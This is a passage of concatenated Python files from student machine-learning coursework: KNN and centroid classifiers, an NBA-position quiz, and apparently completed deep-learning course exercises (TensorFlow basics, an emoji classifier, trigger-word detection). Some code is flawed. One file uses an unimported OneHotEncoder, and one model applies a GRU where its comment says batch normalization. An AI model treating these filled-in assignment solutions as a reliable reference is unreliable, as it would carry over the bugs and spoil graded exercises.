label_votes[label] = 1
sorted_votes=sorted(label_votes.items(), key=lambda kv: kv[1], reverse=True) ## sorted by vote numbers
return sorted_votes[0][0]
if __name__ == "__main__":
X = [[0], [1], [2], [3]]
y = [0, 0, 1, 1]
knn = KNN(3)
pred = knn.fit_predict(X, y, [1.1])
print("Predicted class is: ", pred)
```
#### File: CSE-6363_MACHINE-LEARNING/Project2/mainD.py
```python
from mainC import onehot_convert, z_score_convert
import numpy as np
def centroid_method(X_train, y_train, X_test, y_test):
labels = np.unique(y_train)
centroids = np.zeros((X_train.shape[0], len(labels)))
y_output = []
for l in range(len(labels)):
centroids[:,l] = np.mean(X_train[:, y_train == labels[l]], axis=1)
for xt in np.transpose(X_test):
distance = np.linalg.norm(centroids - np.vstack(xt), axis=0)
y_output.append(labels[np.argmin(distance)])
score = np.mean(np.array(y_output) == y_test)
return score
if __name__ == "__main__":
filename = "./data/HandWrittenLetters.txt"
dataset = np.loadtxt(filename, delimiter=",")
print(dataset.shape)
X, Y = dataset[1:], dataset[0]
print(X.shape, Y.shape)
X_train, X_test = X[:, :800], X[:, 800:]
y_train, y_test = Y[:800], Y[800:]
score = centroid_method(X_train, y_train, X_test, y_test)
print("The accuracy of centroid method is: ", score)
```
#### File: Quiz2/q4/q4.py
```python
import pandas as pd
import numpy as np
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
from sklearn import svm
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
pd.options.display.max_columns = None
pd.options.display.max_rows = None
np.set_printoptions(threshold=np.inf)
# Step1: select data file and drop unused player
dataset = pd.read_csv("./Classification_in_NBA_data/NBA_4.txt", sep=' ')
Y = dataset['Pos']
dataset = dataset.drop(['Player', 'Tm', 'Pos'], axis=1)
print(dataset.head())
def minmax_convert(X):
scaler = MinMaxScaler()
return scaler.fit_transform(X)
def onehot_convert(X):
encoder = OneHotEncoder()
X = encoder.fit_transform(X).toarray().tolist()
return X
# Partition the dataset
dataset = minmax_convert(dataset)
X_train, y_train = [d[1:] for d in dataset[:482]], [d[0] for d in Y[:482]]
X_test = [d[1:] for d in dataset[482:]]
csv_data = pd.DataFrame(dataset)
csv_data.to_csv('./output.csv', index=False)
# KNN
import math
class KNN:
def __init__(self, K):
self.K = K
self.distances = []
self.k_neighbors = []
@staticmethod
def distance(X1, X2):
dist = 0
for (x1, x2) in zip(X1, X2):
dist += (x1 - x2) ** 2
return dist
def fit_predict(self, X_train, y_train, test_sample):
self.k_neighbors, self.distances = [], []
for X, y in zip(X_train, y_train):
d = self.distance(X, test_sample)
self.distances.append((X, y, d))
self.distances.sort(key=lambda x: x[-1]) # sort by distance
self.k_neighbors = [sample[0:-1] for sample in self.distances[0:self.K]]
label_votes={}
for neighbor in self.k_neighbors:
label = neighbor[-1]
if label in label_votes.keys():
label_votes[label] += 1
else:
label_votes[label] = 1
sorted_votes=sorted(label_votes.items(), key=lambda kv: kv[1], reverse=True) ## sorted by vote numbers
return sorted_votes[0][0]
knn = KNN(3)
pred_knn = []
for i in tqdm(range(len(X_test))):
pred_knn.append(knn.fit_predict(X_train, y_train, X_test[i]))
print("The prediction of KNN:", pred_knn)
# Centroid Method
def centroid_method(X_train, y_train, X_test):
labels = np.unique(y_train)
centroids = np.zeros((X_train.shape[0], len(labels)))
y_output = []
for l in range(len(labels)):
centroids[:,l] = np.mean(X_train[:, y_train == labels[l]], axis=1)
for xt in np.transpose(X_test):
distance = np.linalg.norm(centroids - np.vstack(xt), axis=0)
y_output.append(labels[np.argmin(distance)])
return y_output
pred_cm = centroid_method(np.array(X_train).T, np.array(y_train), np.array(X_test).T)
print("The prediction of centroid method is:", pred_cm)
## SVM: Linaer/Gaussian
clf = svm.SVC(kernel='linear')
clf.fit(X_train, y_train)
pred_svm = clf.predict(X_test)
print("The prediction of SVM:", pred_svm)
``` |
{
"source": "824zzy/Deeplearning_Homework",
"score": 4
} |
#### File: Lec2:HyperparameterTuning_Regularization_Opitimization/week3:TensorFlow_tutorial/tensorflow_tutorial.py
```python
import math
import numpy as np
import h5py
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python.framework import ops
from utils.tf_utils import load_dataset, random_mini_batches, convert_to_one_hot, predict
from tensorflow.contrib import layers
np.random.seed(1)
""" exploring the Tensorflow Library"""
# # loss function in tensorflow
# y_hat = tf.constant(36, name='y_hat')
# y = tf.constant(39, name='y')
#
# loss = tf.Variable((y-y_hat)**2, name='loss')
# # todo: https://blog.csdn.net/u012436149/article/details/78291545
# init = tf.global_variables_initializer()
#
# with tf.Session() as session:
# session.run(init)
# print "loss: " + str(session.run(loss))
# print "----------"
# session.close()
# # session
# a = tf.constant(2)
# b = tf.constant(10)
# c = tf.multiply(a, b)
# print(c)
# sess = tf.Session()
# print(sess.run(c))
# # placeholder
# x = tf.placeholder(tf.int64, name='x')
# print(sess.run(2 * x, feed_dict={x: 3}))
# print("----------")
# sess.close()
# linear function
def linear_function():
"""
Implements a linear function:
Initializes W to be a random tensor of shape (4,3)
Initializes X to be a random tensor of shape (3,1)
Initializes b to be a random tensor of shape (4,1)
Returns:
result -- runs the session for Y = WX + b
"""
np.random.seed(1)
X = tf.constant(np.random.randn(3, 1), name="X")
W = tf.constant(np.random.randn(4, 3), name="W")
b = tf.constant(np.random.randn(4, 1), name="W")
Y = tf.add(tf.matmul(W, X), b)
# Create the session using tf.Session() and run it with sess.run(...) on the variable you want to calculate
sess = tf.Session()
result = sess.run(Y)
return result
# # test case for linear_function
# print("result = " + str(linear_function()))
# computing the sigmoid
def sigmoid(z):
"""
Computes the sigmoid of z
Arguments:
z -- input value, scalar or vector
Returns:
results -- the sigmoid of z
"""
# Create a placeholder for x. Name it 'x'.
x = tf.placeholder(tf.float32, name="x")
# compute sigmoid(x)
sigmoid = tf.sigmoid(x)
# Create a session, and run it. Please use the method 2 explained above.
# You should use a feed_dict to pass z's value to x.
with tf.Session() as sess:
# Run session and call the output "result"
result = sess.run(sigmoid, feed_dict={x: z})
return result
# # test case for sigmoid
# print ("sigmoid(0) = " + str(sigmoid(0)))
# print ("sigmoid(12) = " + str(sigmoid(12)))
# compute the cost
def cost(logits, labels):
"""
Computes the cost using the sigmoid cross entropy
Arguments:
logits -- vector containing z, output of the last linear unit (before the final sigmoid activation)
labels -- vector of labels y (1 or 0)
Note: What we've been calling "z" and "y" in this class are respectively called "logits" and "labels"
in the TensorFlow documentation. So logits will feed into z, and labels into y.
Returns:
cost -- runs the session of the cost (formula (2))
"""
# Create the placeholders for "logits" (z) and "labels" (y) (approx. 2 lines)
z = tf.placeholder(tf.float32, name="z")
y = tf.placeholder(tf.float32, name="y")
# Use the loss function (approx. 1 line)
cost = tf.nn.sigmoid_cross_entropy_with_logits(logits=z, labels=y)
# Create a session (approx. 1 line). See method 1 above.
sess = tf.Session()
# Run the session (approx. 1 line).
cost = sess.run(cost, feed_dict={z: logits, y: labels})
# Close the session (approx. 1 line). See method 1 above.
sess.close()
return cost
# # test case for cost
# logits = sigmoid(np.array([0.2, 0.4, 0.7, 0.9]))
# cost = cost(logits, np.array([0, 0, 1, 1]))
# print ("cost = " + str(cost))
# Using One Hot encodings
def one_hot_matrix(labels, C):
"""
Creates a matrix where the i-th row corresponds to the ith class number and the jth column
corresponds to the jth training example. So if example j had a label i. Then entry (i,j)
will be 1.
Arguments:
labels -- vector containing the labels
C -- number of classes, the depth of the one hot dimension
Returns:
one_hot -- one hot matrix
"""
# Create a tf.constant equal to C (depth), name it 'C'. (approx. 1 line)
C = tf.constant(C, name="C")
# Use tf.one_hot, be careful with the axis (approx. 1 line)
one_hot_matrix = tf.one_hot(labels, C, axis=0)
# Create the session (approx. 1 line)
sess = tf.Session()
# Run the session (approx. 1 line)
one_hot = sess.run(one_hot_matrix)
# Close the session (approx. 1 line). See method 1 above.
sess.close()
return one_hot
# # test case for one-hot vector
# labels = np.array([1, 2, 3, 0, 2, 1])
# one_hot = one_hot_matrix(labels, C=4)
# print ("one_hot = " + str(one_hot))
## Initialize with Zeros and Ones
def ones(shape):
"""
Creates an array of ones of dimension shape
Arguments:
shape -- shape of the array you want to create
Returns:
ones -- array containing only ones
"""
# Create "ones" tensor using tf.ones(...). (approx. 1 line)
ones = tf.ones(shape)
# Create the session (approx. 1 line)
sess = tf.Session()
# Run the session to compute 'ones' (approx. 1 line)
ones = sess.run(ones)
# Close the session (approx. 1 line). See method 1 above.
sess.close()
return ones
# # test case for ones
# print ("ones = " + str(ones([3])))
""" Building your first neural network in Tensorflow """
# SIGNS Dataset: teach our computers to decipher sign language.
# Training set: 1080 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (180 pictures per number).
# Test set: 120 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (20 pictures per number).
# Loading the dataset
X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()
# # show Example of a picture
# index = 0
# plt.imshow(X_train_orig[index])
# plt.show()
# print ("y = " + str(np.squeeze(Y_train_orig[:, index])))
# Flatten the training and test images
X_train_flatten = X_train_orig.reshape(X_train_orig.shape[0], -1).T
X_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T
# Normalize image vectors
X_train = X_train_flatten/255.
X_test = X_test_flatten/255.
# Convert training and test labels to one hot matrices
Y_train = convert_to_one_hot(Y_train_orig, 6)
Y_test = convert_to_one_hot(Y_test_orig, 6)
# # test case for datasets
# print ("number of training examples = " + str(X_train.shape[1]))
# print ("number of test examples = " + str(X_test.shape[1]))
# print ("X_train shape: " + str(X_train.shape))
# print ("Y_train shape: " + str(Y_train.shape))
# print ("X_test shape: " + str(X_test.shape))
# print ("Y_test shape: " + str(Y_test.shape))
""" The model is LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX. """
# create placeholders
def create_placeholders(n_x, n_y):
"""
Creates the placeholders for the tensorflow session.
Arguments:
n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288)
n_y -- scalar, number of classes (from 0 to 5, so -> 6)
Returns:
X -- placeholder for the data input, of shape [n_x, None] and dtype "float"
Y -- placeholder for the input labels, of shape [n_y, None] and dtype "float"
Tips:
- You will use None because it let's us be flexible on the number of examples you will for the placeholders.
In fact, the number of examples during test/train is different.
"""
X = tf.placeholder(tf.float32, [n_x, None])
Y = tf.placeholder(tf.float32, [n_y, None])
return X, Y
# # test case for create placeholder
# X, Y = create_placeholders(12288, 6)
# print ("X = " + str(X))
# print ("Y = " + str(Y))
# initializing the parameters
def initialize_parameters():
"""
Initializes parameters to build a neural network with tensorflow. The shapes are:
W1 : [25, 12288]
b1 : [25, 1]
W2 : [12, 25]
b2 : [12, 1]
W3 : [6, 12]
b3 : [6, 1]
Returns:
parameters -- a dictionary of tensors containing W1, b1, W2, b2, W3, b3
"""
tf.set_random_seed(1) # so that your "random" numbers match ours
# todo: tf.contrib.layers.xavier_initializer(seed = 1) deprecated by from tensorflow.contrib import layers
W1 = tf.get_variable(name="W1", shape=[25, 12288], initializer=layers.xavier_initializer(seed=1))
b1 = tf.get_variable(name="b1", shape=[25, 1], initializer=tf.zeros_initializer())
W2 = tf.get_variable(name="W2", shape=[12, 25], initializer=layers.xavier_initializer(seed=1))
b2 = tf.get_variable(name="b2", shape=[12, 1], initializer=tf.zeros_initializer())
W3 = tf.get_variable(name="W3", shape=[6, 12], initializer=layers.xavier_initializer(seed=1))
b3 = tf.get_variable(name="b3", shape=[6, 1], initializer=tf.zeros_initializer())
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2,
"W3": W3,
"b3": b3}
return parameters
# test case for init param
# tf.reset_default_graph()
# with tf.Session() as sess:
# parameters = initialize_parameters()
# print("W1 = " + str(parameters["W1"]))
# print("b1 = " + str(parameters["b1"]))
# print("W2 = " + str(parameters["W2"]))
# print("b2 = " + str(parameters["b2"]))
# Forward propagation in tensorflow
def forward_propagation(X, parameters):
"""
Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX
Arguments:
X -- input dataset placeholder, of shape (input size, number of examples)
parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3"
the shapes are given in initialize_parameters
Returns:
Z3 -- the output of the last LINEAR unit
"""
# Retrieve the parameters from the dictionary "parameters"
W1 = parameters['W1']
b1 = parameters['b1']
W2 = parameters['W2']
b2 = parameters['b2']
W3 = parameters['W3']
b3 = parameters['b3']
# Numpy Equivalents:
Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1
A1 = tf.nn.relu(Z1) # A1 = relu(Z1)
Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, a1) + b2
A2 = tf.nn.relu(Z2) # A2 = relu(Z2)
Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3,A2) + b3
return Z3
# # test case for forward prop
# tf.reset_default_graph()
#
# with tf.Session() as sess:
# X, Y = create_placeholders(12288, 6)
# parameters = initialize_parameters()
# Z3 = forward_propagation(X, parameters)
# print("Z3 = " + str(Z3))
# compute cost
def compute_cost(Z3, Y):
"""
Computes the cost
Arguments:
Z3 -- output of forward propagation (output of the last LINEAR unit), of shape (6, number of examples)
Y -- "true" labels vector placeholder, same shape as Z3
Returns:
cost - Tensor of the cost function
"""
# to fit the tensorflow requirement for tf.nn.softmax_cross_entropy_with_logits(...,...)
logits = tf.transpose(Z3)
labels = tf.transpose(Y)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))
return cost
# # test case for cost
# tf.reset_default_graph()
#
# with tf.Session() as sess:
# X, Y = create_placeholders(12288, 6)
# parameters = initialize_parameters()
# Z3 = forward_propagation(X, parameters)
# cost = compute_cost(Z3, Y)
# print("cost = " + str(cost))
# backward propagation & parameter updates
def model(X_train, Y_train, X_test, Y_test, learning_rate=0.0001,
num_epochs=1500, minibatch_size=32, print_cost=True):
"""
Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX.
Arguments:
X_train -- training set, of shape (input size = 12288, number of training examples = 1080)
Y_train -- test set, of shape (output size = 6, number of training examples = 1080)
X_test -- training set, of shape (input size = 12288, number of training examples = 120)
Y_test -- test set, of shape (output size = 6, number of test examples = 120)
learning_rate -- learning rate of the optimization
num_epochs -- number of epochs of the optimization loop
minibatch_size -- size of a minibatch
print_cost -- True to print the cost every 100 epochs
Returns:
parameters -- parameters learnt by the model. They can then be used to predict.
"""
ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables
tf.set_random_seed(1) # to keep consistent results
seed = 3 # to keep consistent results
(n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set)
n_y = Y_train.shape[0] # n_y : output size
costs = [] # To keep track of the cost
# Create Placeholders of shape (n_x, n_y)
X, Y = create_placeholders(n_x, n_y)
# Initialize parameters
parameters = initialize_parameters()
# Forward propagation: Build the forward propagation in the tensorflow graph
Z3 = forward_propagation(X, parameters)
# Cost function: Add cost function to tensorflow graph
cost = compute_cost(Z3, Y)
# Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer.
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# Initialize all the variables
init = tf.global_variables_initializer()
# Start the session to compute the tensorflow graph
with tf.Session() as sess:
# Run the initialization
sess.run(init)
# Do the training loop
for epoch in range(num_epochs):
epoch_cost = 0. # Defines a cost related to an epoch
num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set
seed = seed + 1
minibatches = random_mini_batches(X_train, Y_train, minibatch_size, seed)
for minibatch in minibatches:
# Select a minibatch
(minibatch_X, minibatch_Y) = minibatch
# IMPORTANT: The line that runs the graph on a minibatch.
# Run the session to execute the "optimizer" and the "cost", the feedict should contain a minibatch for (X,Y).
_, minibatch_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})
epoch_cost += minibatch_cost / num_minibatches
# Print the cost every epoch
if print_cost == True and epoch % 100 == 0:
print ("Cost after epoch %i: %f" % (epoch, epoch_cost))
if print_cost == True and epoch % 5 == 0:
costs.append(epoch_cost)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learning_rate))
plt.show()
# lets save the parameters in a variable
parameters = sess.run(parameters)
print ("Parameters have been trained!")
# Calculate the correct predictions
correct_prediction = tf.equal(tf.argmax(Z3), tf.argmax(Y))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
print ("Train Accuracy:", accuracy.eval({X: X_train, Y: Y_train}))
print ("Test Accuracy:", accuracy.eval({X: X_test, Y: Y_test}))
return parameters
# # test case for model
# parameters = model(X_train, Y_train, X_test, Y_test)
```
#### File: week2:NLP_and_Word Embedding/Emojify/emojifier_V1_main.py
```python
import numpy as np
from emo_utils import *
import emoji
import matplotlib.pyplot as plt
""" Baseline model: Emojifier-V1 """
X_train, Y_train = read_csv('data/train_emoji.csv')
X_test, Y_test = read_csv('data/tesss.csv')
maxLen = len(max(X_train, key=len).split())
# # test case for data
# index = 1
# print(X_train[index], label_to_emoji(Y_train[index]))
Y_oh_train = convert_to_one_hot(Y_train, C=5)
Y_oh_test = convert_to_one_hot(Y_test, C=5)
# # test case for one-hot data
# index = 50
# print(Y_train[index], "is converted into one hot", Y_oh_train[index])
# implementing emojifier V1
word_to_index, index_to_word, word_to_vec_map = read_glove_vecs('data/glove.6B.50d.txt')
# # test case for word to vec map
# word = "cucumber"
# index = 289846
# print("the index of", word, "in the vocabulary is", word_to_index[word])
# print("the", str(index) + "th word in the vocabulary is", index_to_word[index])
# sentence to avg
def sentence_to_avg(sentence, word_to_vec_map):
"""
Converts a sentence (string) into a list of words (strings). Extracts the GloVe representation of each word
and averages its value into a single vector encoding the meaning of the sentence.
Arguments:
sentence -- string, one training example from X
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
Returns:
avg -- average vector encoding information about the sentence, numpy-array of shape (50,)
"""
# Step 1: Split sentence into list of lower case words (≈ 1 line)
words = (sentence.lower()).split()
# Initialize the average word vector, should have the same shape as your word vectors.
avg = np.zeros(50)
# Step 2: average the word vectors. You can loop over the words in the list "words".
for w in words:
avg += word_to_vec_map[w]
avg = avg / len(words)
return avg
# # test case for sentence to avg
# avg = sentence_to_avg("Morrocan couscous is my favorite dish", word_to_vec_map)
# print("avg = ", avg)
# model
def model(X, Y, word_to_vec_map, learning_rate=0.01, num_iterations=400):
"""
Model to train word vector representations in numpy.
Arguments:
X -- input data, numpy array of sentences as strings, of shape (m, 1)
Y -- labels, numpy array of integers between 0 and 7, numpy-array of shape (m, 1)
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
learning_rate -- learning_rate for the stochastic gradient descent algorithm
num_iterations -- number of iterations
Returns:
pred -- vector of predictions, numpy-array of shape (m, 1)
W -- weight matrix of the softmax layer, of shape (n_y, n_h)
b -- bias of the softmax layer, of shape (n_y,)
"""
np.random.seed(1)
# Define number of training examples
m = Y.shape[0] # number of training examples
n_y = 5 # number of classes
n_h = 50 # dimensions of the GloVe vectors
# Initialize parameters using Xavier initialization
W = np.random.randn(n_y, n_h) / np.sqrt(n_h)
b = np.zeros((n_y,))
# Convert Y to Y_onehot with n_y classes
Y_oh = convert_to_one_hot(Y, C=n_y)
# Optimization loop
for t in range(num_iterations): # Loop over the number of iterations
for i in range(m): # Loop over the training examples
# Average the word vectors of the words from the j'th training example
avg = sentence_to_avg(X[i], word_to_vec_map)
# Forward propagate the avg through the softmax layer
z = np.dot(W, avg) + b
a = softmax(z)
# Compute cost using the j'th training label's one hot representation and "A" (the output of the softmax)
cost = -np.sum(Y_oh[i] * np.log(a))
# Compute gradients
dz = a - Y_oh[i]
dW = np.dot(dz.reshape(n_y, 1), avg.reshape(1, n_h))
db = dz
# Update parameters with Stochastic Gradient Descent
W = W - learning_rate * dW
b = b - learning_rate * db
if t % 100 == 0:
print("Epoch: " + str(t) + " --- cost = " + str(cost))
pred = predict(X, Y, W, b, word_to_vec_map)
return pred, W, b
# # test case for model V1
# print(X_train.shape)
# print(Y_train.shape)
# print(np.eye(5)[Y_train.reshape(-1)].shape)
# print(X_train[0])
# print(type(X_train))
# Y = np.asarray([5, 0, 0, 5, 4, 4, 4, 6, 6, 4, 1, 1, 5, 6, 6, 3, 6, 3, 4, 4])
# print(Y.shape)
#
# X = np.asarray(['I am going to the bar tonight', 'I love you', 'miss you my dear',
# 'Lets go party and drinks','Congrats on the new job','Congratulations',
# 'I am so happy for you', 'Why are you feeling bad', 'What is wrong with you',
# 'You totally deserve this prize', 'Let us go play football',
# 'Are you down for football this afternoon', 'Work hard play harder',
# 'It is suprising how people can be dumb sometimes',
# 'I am very disappointed','It is the best day in my life',
# 'I think I will end up alone','My life is so boring','Good job',
# 'Great so awesome'])
#
# print(X.shape)
# print(np.eye(5)[Y_train.reshape(-1)].shape)
# print(type(X_train))
# # train your model and examining test set performance
# pred, W, b = model(X_train, Y_train, word_to_vec_map)
# print(pred)
# print("Training set:")
# pred_train = predict(X_train, Y_train, W, b, word_to_vec_map)
# print('Test set:')
# pred_test = predict(X_test, Y_test, W, b, word_to_vec_map)
#
#
# X_my_sentences = np.array(["i adore you", "i love you", "funny lol", "lets play with a ball", "food is ready", "not feeling happy"])
# Y_my_labels = np.array([[0], [0], [2], [1], [4],[3]])
#
# pred = predict(X_my_sentences, Y_my_labels , W, b, word_to_vec_map)
# print_predictions(X_my_sentences, pred)
#
# print(Y_test.shape)
# print(' '+ label_to_emoji(0)+ ' ' + label_to_emoji(1) + ' ' + label_to_emoji(2)+ ' ' + label_to_emoji(3)+' ' + label_to_emoji(4))
# print(pd.crosstab(Y_test, pred_test.reshape(56,), rownames=['Actual'], colnames=['Predicted'], margins=True))
# plot_confusion_matrix(Y_test, pred_test)
```
#### File: week3:Sequence_models_and_Attention_mechanism/Trigger word detection/Trigger_Word_Detection_main.py
```python
import numpy as np
# todo: pudub package to manipulate audio: Pydub converts raw audio files into lists of Pydub data structures
from pydub import AudioSegment
import random
import sys
import io
import os
import glob
from td_utils import *
from keras.callbacks import ModelCheckpoint
from keras.models import Model, load_model, Sequential
from keras.layers import Dense, Activation, Dropout, Input, Masking, TimeDistributed, LSTM, Conv1D
from keras.layers import GRU, Bidirectional, BatchNormalization, Reshape
from keras.optimizers import Adam
""" Data synthesis: Creating a speech dataset """
# From audio recordings to spectrograms
x = graph_spectrogram("audio_examples/example_train.wav")
_, data = wavfile.read("audio_examples/example_train.wav")
# test case for data loading
# print("Time steps in audio recording before spectrogram", data[:,0].shape)
# print("Time steps in input after spectrogram", x.shape)
# parameters defination
Tx = 5511 # The number of time steps input to the model from the spectrogram
n_freq = 101 # Number of frequencies input to the model at each time step of the spectrogram
Ty = 1375 # The number of time steps in the output of our model
# Generating a single training example
# Load audio segments using pydub
activates, negatives, backgrounds = load_raw_audio()
# # test case for audio loading
# print("background len: " + str(len(backgrounds[0]))) # Should be 10,000, since it is a 10 sec clip
# print("activate[0] len: " + str(len(activates[0]))) # Maybe around 1000, since an "activate" audio clip is usually around 1 sec (but varies a lot)
# print("activate[1] len: " + str(len(activates[1]))) # Different "activate" clips can have different lengths
# help functions: get random time segment and is_overlapping
def get_random_time_segment(segment_ms):
"""
Gets a random time segment of duration segment_ms in a 10,000 ms audio clip.
Arguments:
segment_ms -- the duration of the audio clip in ms ("ms" stands for "milliseconds")
Returns:
segment_time -- a tuple of (segment_start, segment_end) in ms
"""
segment_start = np.random.randint(low=0, high=10000 - segment_ms) # Make sure segment doesn't run past the 10sec background
segment_end = segment_start + segment_ms - 1
return segment_start, segment_end
def is_overlapping(segment_time, previous_segments):
"""
Checks if the time of a segment overlaps with the times of existing segments.
Arguments:
segment_time -- a tuple of (segment_start, segment_end) for the new segment
previous_segments -- a list of tuples of (segment_start, segment_end) for the existing segments
Returns:
True if the time segment overlaps with any of the existing segments, False otherwise
"""
segment_start, segment_end = segment_time
# Step 1: Initialize overlap as a "False" flag. (≈ 1 line)
overlap = False
# Step 2: loop over the previous_segments start and end times.
# Compare start/end times and set the flag to True if there is an overlap (≈ 3 lines)
for previous_start, previous_end in previous_segments:
if previous_start <= segment_start <= previous_end or previous_start <= segment_end <= previous_end:
overlap = True
return overlap
# # test case for overlapping
# overlap1 = is_overlapping((950, 1430), [(2000, 2550), (260, 949)])
# overlap2 = is_overlapping((2305, 2950), [(824, 1532), (1900, 2305), (3424, 3656)])
# print("Overlap 1 = ", overlap1)
# print("Overlap 2 = ", overlap2)
# insert audio clip
def insert_audio_clip(background, audio_clip, previous_segments):
"""
Insert a new audio segment over the background noise at a random time step, ensuring that the
audio segment does not overlap with existing segments.
Arguments:
background -- a 10 second background audio recording.
audio_clip -- the audio clip to be inserted/overlaid.
previous_segments -- times where audio segments have already been placed
Returns:
new_background -- the updated background audio
"""
# Get the duration of the audio clip in ms
segment_ms = len(audio_clip)
# Step 1: Use one of the helper functions to pick a random time segment onto which to insert
# the new audio clip. (≈ 1 line)
segment_time = get_random_time_segment(segment_ms)
# Step 2: Check if the new segment_time overlaps with one of the previous_segments. If so, keep
# picking new segment_time at random until it doesn't overlap. (≈ 2 lines)
while is_overlapping(segment_time, previous_segments):
segment_time = get_random_time_segment(segment_ms)
# Step 3: Add the new segment_time to the list of previous_segments (≈ 1 line)
previous_segments.append(segment_time)
# Step 4: Superpose audio segment and background
new_background = background.overlay(audio_clip, position=segment_time[0])
return new_background, segment_time
# # test case for insert audio
# np.random.seed(5)
# audio_clip, segment_time = insert_audio_clip(backgrounds[0], activates[0], [(3790, 4400)])
# audio_clip.export("insert_test.wav", format="wav")
# print("Segment Time: ", segment_time)
# insert ones
def insert_ones(y, segment_end_ms):
"""
Update the label vector y. The labels of the 50 output steps strictly after the end of the segment
should be set to 1. By strictly we mean that the label of segment_end_y should be 0 while, the
50 followinf labels should be ones.
Arguments:
y -- numpy array of shape (1, Ty), the labels of the training example
segment_end_ms -- the end time of the segment in ms
Returns:
y -- updated labels
"""
# duration of the background (in terms of spectrogram time-steps)
segment_end_y = int(segment_end_ms * Ty / 10000.0)
# Add 1 to the correct index in the background label (y)
for i in range(segment_end_y + 1, segment_end_y + 51):
if i < Ty:
y[0, i] = 1
return y
# # test case for insert ones's sanity checks
# arr1 = insert_ones(np.zeros((1, Ty)), 9700)
# plt.plot(insert_ones(arr1, 4251)[0, :])
# print("sanity checks:", arr1[0][1333], arr1[0][634], arr1[0][635])
# creating training examples
def create_training_example(background, activates, negatives):
"""
Creates a training example with a given background, activates, and negatives.
Arguments:
background -- a 10 second background audio recording
activates -- a list of audio segments of the word "activate"
negatives -- a list of audio segments of random words that are not "activate"
Returns:
x -- the spectrogram of the training example
y -- the label at each time step of the spectrogram
"""
# Set the random seed
np.random.seed(18)
# Make background quieter
background = background - 20
# Step 1: Initialize y (label vector) of zeros (≈ 1 line)
y = np.zeros((1, Ty))
# Step 2: Initialize segment times as empty list (≈ 1 line)
previous_segments = []
# Select 0-4 random "activate" audio clips from the entire list of "activates" recordings
number_of_activates = np.random.randint(0, 5)
random_indices = np.random.randint(len(activates), size=number_of_activates)
random_activates = [activates[i] for i in random_indices]
# Step 3: Loop over randomly selected "activate" clips and insert in background
for random_activate in random_activates:
# Insert the audio clip on the background
background, segment_time = insert_audio_clip(background, random_activate, previous_segments)
# Retrieve segment_start and segment_end from segment_time
segment_start, segment_end = segment_time
# Insert labels in "y"
y = insert_ones(y, segment_end)
# Select 0-2 random negatives audio recordings from the entire list of "negatives" recordings
number_of_negatives = np.random.randint(0, 3)
random_indices = np.random.randint(len(negatives), size=number_of_negatives)
random_negatives = [negatives[i] for i in random_indices]
# Step 4: Loop over randomly selected negative clips and insert in background
for random_negative in random_negatives:
# Insert the audio clip on the background
background, _ = insert_audio_clip(background, random_negative, previous_segments)
# Standardize the volume of the audio clip
background = match_target_amplitude(background, -20.0)
# Export new training example
file_handle = background.export("train" + ".wav", format="wav")
print("File (train.wav) was saved in your directory.")
# Get and plot spectrogram of the new recording (background with superposition of positive and negatives)
x = graph_spectrogram("train.wav")
return x, y
# test case for creating training example
# x, y = create_training_example(backgrounds[0], activates, negatives)
# Full training set
# Load preprocessed training examples
X = np.load("./XY_train/X.npy")
Y = np.load("./XY_train/Y.npy")
# Load preprocessed dev set examples
X_dev = np.load("./XY_dev/X_dev.npy")
Y_dev = np.load("./XY_dev/Y_dev.npy")
""" Model """
def model(input_shape):
"""
Function creating the model's graph in Keras.
Argument:
input_shape -- shape of the model's input data (using Keras conventions)
Returns:
model -- Keras model instance
"""
X_input = Input(shape=input_shape)
# Step 1: CONV layer (≈4 lines)
X = Conv1D(filters=196, kernel_size=15, strides=4)(X_input) # CONV1D
X = GRU(units=128, return_sequences=True)(X) # Batch normalization
X = Activation("relu")(X) # ReLu activation
X = Dropout(0.8)(X) # dropout (use 0.8)
# Step 2: First GRU Layer (≈4 lines)
X = GRU(units=128, return_sequences=True)(X) # GRU (use 128 units and return the sequences)
X = Dropout(0.8)(X) # dropout (use 0.8)
X = BatchNormalization()(X) # Batch normalization
# Step 3: Second GRU Layer (≈4 lines)
X = GRU(units=128, return_sequences=True)(X) # GRU (use 128 units and return the sequences)
X = Dropout(0.8)(X) # dropout (use 0.8)
X = BatchNormalization()(X) # Batch normalization
X = Dropout(0.8)(X) # dropout (use 0.8)
# Step 4: Time-distributed dense layer (≈1 line)
X = TimeDistributed(Dense(1, activation="sigmoid"))(X) # time distributed (sigmoid)
model = Model(inputs=X_input, outputs=X)
return model
# test case for model
# model = model(input_shape = (Tx, n_freq))
# model.summary()
# load a trained model for saving time
# # load model
